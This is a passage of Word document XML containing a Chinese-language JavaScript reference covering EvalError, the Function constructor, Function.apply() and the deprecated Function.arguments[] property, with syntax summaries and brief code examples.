      <w:r>
        <w:t>EvalError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数时，它的行为和带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符调用时一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一条提供该异常的细节的错误消息。这个属性的值为传入构造函数的字符串或者自定义实现的默认字符串。更多细节可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>。</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一个指定该异常类型的字符串。所有</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>的这个属性都继承自值</w:t>
      </w:r>
      <w:r>
        <w:t>"EvalError"</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当全局函数</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>以任意其他名字调用时，可能会抛出</w:t>
      </w:r>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
      <w:r>
        <w:t>类的一个实例。关于如何调用这个函数的限制，可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>。关于异常的抛出和捕获的细节，可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w: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Error</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.message</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Error.name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="664" w:name="Function"/>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="664"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function functionname(argument_name_list)//</w:t>
      </w:r>
      <w:r>
        <w:t>函数定义语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(argum</w:t>
      </w:r>
      <w:r>
        <w:t>ent_name_list){body}//</w:t>
      </w:r>
      <w:r>
        <w:t>匿名函数直接量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>functionname(argument_value_list)//</w:t>
      </w:r>
      <w:r>
        <w:t>函数调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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Function(argument_names...,body)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>argument_names...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>任意多个字符串参数，每个字符串命名要创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个或多个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定函数体的字符串。它可以含有任意多条</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句，这些语句之间用分号隔开，并且可以引用任意参数名，这些参数名由前面提到的传给构造函数的参数指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>新创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象。调用该函数会执行由</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>指定的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示在</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>参数或某个</w:t>
      </w:r>
      <w:r>
        <w:t>argument_names</w:t>
      </w:r>
      <w:r>
        <w:t>参数中存在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>arguments[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给函数的参数数组。不推荐使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>caller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用该函数的</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象的引用。如果是全局调</w:t>
      </w:r>
      <w:r>
        <w:t>用，则该属性为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。不推荐使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>声明函数时指定的形参个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个给构造函数用的对象。用构造函数创建的所有对象会共享</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义的属性和方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将函数作为指定对象的方法来调用。传递给它的是指定的参数数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个新函数。通过可选的指定参数，作为指定对象的方法调用该方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将函数作为指定对象的方法来调用。传递给它的是指定的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回函数的字符串表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一种基本数据类型。第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章解释了如何定义和使用函数。第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了方法、构造函数以及函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性等相关主题。要了解详细情况，请阅读这两章。注意，虽然可以使用这里介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建函数对象，但这样做效率不高。在大部分情况下，推荐使用函数定义语句或函数直接量来定义函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript 1.1</w:t>
      </w:r>
      <w:r>
        <w:t>及后续版本中，函数体会自动定义一个局部变量</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>，指代</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该对象是一个值数组，元素是传递给函数的参数值。不要将这一属性与</w:t>
      </w:r>
      <w:r>
        <w:t>上面介绍的弃用的</w:t>
      </w:r>
      <w:r>
        <w:t>arguments[]</w:t>
      </w:r>
      <w:r>
        <w:t>属性相混淆。详见</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>的参考页。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章、第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="665" w:name="Function_apply__"/>
      <w:r>
        <w:t>Function.apply()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="665"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将函数作为一个对象的方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>function.apply(thisobj,args)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>的对象。在函数体中，</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>是关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值。如果这个参数为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，则使用全局对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>args</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个值数组。它的元素是传递给</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>的参数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Ty</w:t>
      </w:r>
      <w:r>
        <w:t>peError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果调用该函数的对象不是函数，或者参数</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>不是数组和</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象，则抛出该异常。</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apply()</w:t>
      </w:r>
      <w:r>
        <w:t>将指定的函数</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>作为对象</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来调用，并传入在</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>数组中包含的参数。它返回的是调用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值。在函数体内，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指代</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>参数必须是数组或</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果想单独指定传递给函数的参数，而不是通过数组元素来指定参数，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Function.call()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</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将默认的</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>应用在一个对象上，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以便覆盖该对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。注意没传参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.toString.apply(o);//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>Math.max()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来查找数组中的最大元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意在这种情况下，第一个参数无所谓</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[1,2,3,4,5,6,7,8];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Max.max.apply(null,data);</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Function.call()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="666" w:name="Function_arguments__"/>
      <w:r>
        <w:t>Function.arguments[]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="666"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已弃用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给函数的参数</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function.arguments[i]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>function.arguments.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个参数数组，它的元素是传递给函数的参数。它只在函数执行时才定义。</w:t>
      </w:r>
      <w:r>
        <w:t>arugments.length</w:t>
      </w:r>
